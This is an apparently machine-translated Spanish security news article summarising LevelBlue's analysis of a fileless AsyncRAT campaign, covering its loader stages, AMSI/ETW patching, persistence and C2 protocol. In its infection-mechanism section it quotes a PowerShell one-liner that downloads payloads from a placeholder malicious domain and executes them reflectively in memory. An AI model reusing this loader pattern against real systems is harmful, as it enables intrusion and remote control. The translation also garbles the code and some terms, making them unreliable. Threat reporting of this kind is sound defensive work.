Los investigadores de seguridad han observado recientemente un aumento en las sofisticadas campañas de malware sin archivo dirigidas a entornos empresariales.
Asyncrat, un poderoso troyano de acceso remoto, aprovecha las herramientas legítimas del sistema para ejecutar cargas útiles maliciosas por completo en la memoria, de lado efectivamente de las defensas tradicionales basadas en el disco.
La aparición de esta amenaza subraya las tácticas en evolución empleadas por los adversarios cibernéticos para mantener el sigilo y la persistencia en los sistemas comprometidos.
El acceso inicial en la mayoría de estos ataques se logra a través del software de soporte remoto comprometido. Los intrusos explotan las implementaciones de captura de pantalla no autorizadas, ganando control interactivo sobre máquinas de víctimas.
Una vez dentro, implementan un cargador de varias etapas escrito en VBScript. Los analistas de LevelBlue señalaron que este cargador recupera dos cargas útiles codificadas: logs.ldk y logs.dr, de los servidores controlados por el atacante.
Estas cargas útiles nunca se escriben en el disco; En cambio, se reflejan directamente en la memoria, convirtiendo las matrices de bytes sin procesar en código ejecutable en tiempo de ejecución.
La arquitectura de Asyncrat gira en torno a los ensamblajes modulares de .NET diseñados tanto para la evasión como para la funcionalidad de ratas centrales.
Investigadores de LevelBlue identificado Tres clases principales dentro de la DLL de la primera etapa: un inicializador de punto de entrada, un administrador de persistencia que crea tareas programadas disfrazadas de actualizadores legítimos y un componente anti-análisis que parche los ganchos de AMSI y ETW para deshabilitar el registro de seguridad de Windows.
A través de la resolución de API dinámica y la carga en la memoria, el malware maximiza el sigilo y complica el análisis forense.
Más allá de la ofuscación, la segunda etapa de Asyncrat, AsyncClient.exe, sirve como el motor de comando y control.
Los datos de configuración cifrados dentro del binario especifican los dominios C2, los puertos, los indicadores de infección y los directorios de destino.
Tras el descifrado con AES-256, el cliente establece un socket TCP a su servidor de control, intercambiando paquetes de mensajes prefijados con longitud.
Este protocolo admite comandos de reconocimiento, rutinas de exfiltración de datos y ejecución remota de instrucciones proporcionadas por los atacantes.
Mecanismo de infección
El mecanismo de infección de Asyncrat comienza con la ejecución de un VBScript simple, update.vbs, lanzado a través de wscript.exe.
El script emplea el siguiente fragmento de PowerShell para buscar y ejecutar el cargador:
$ urls = @(“http: //malicious.domain/logs.ldk”, “http: //malicious.domain/logs.ldr”) foreach ($ u en $ urls) {$ bytes = (new-oBject net.webclient) .downloaddata ($ u) (Reflection.Assembly) :: Load ($ bytes) .Entrypoint.invoke ($ null, @())}
Este cargador conciso lleva a cabo dos funciones críticas: descifra los binarios descargados e invoca sus puntos de entrada completamente en la memoria, sin dejar una huella forense en el disco.
Al encadenar la carga basada en la reflexión con rutinas anti-análisis en el obfuscador.dll, el atacante asegura que cada etapa permanezca oculta de las herramientas de detección de punto final.
El control posterior se entrega a AsyncClient.exe, que mantiene la persistencia y permite la administración remota completa del host.
A través de este enfoque sin archivo, Asyncrat demuestra cómo el malware moderno puede combinar plataformas de secuencias de comandos legítimas con tácticas de evasión avanzadas para comprometer y controlar los sistemas dirigidos sin problemas.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
